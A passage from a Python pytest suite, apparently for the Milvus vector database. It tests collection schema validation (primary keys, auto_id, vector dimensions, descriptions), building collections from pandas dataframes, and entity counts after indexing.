fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: todo raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dim -1 and 32759
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.self.collection_wrap is not None and self.self.collection_wrap.collection is not None:
# self.self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: 1.create collection after connection removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. two dup name collection object
2. one object drop collection
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create a 2. drop a 3, re-create a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_none_dataframe(self):
"""
target: test create collection by empty dataframe
method: invalid dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: non-dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with invalid dataframe
method: create with invalid dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_with_none_auto_id(self):
"""
target: test construct with non-int64 as primary field
method: non-int64 as primary field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and not insert ids(primary fields all values are None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
expected: todo
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: two collection object is correct
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities raise exception
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities raise exception
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
class TestCollectionMultiCollections:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
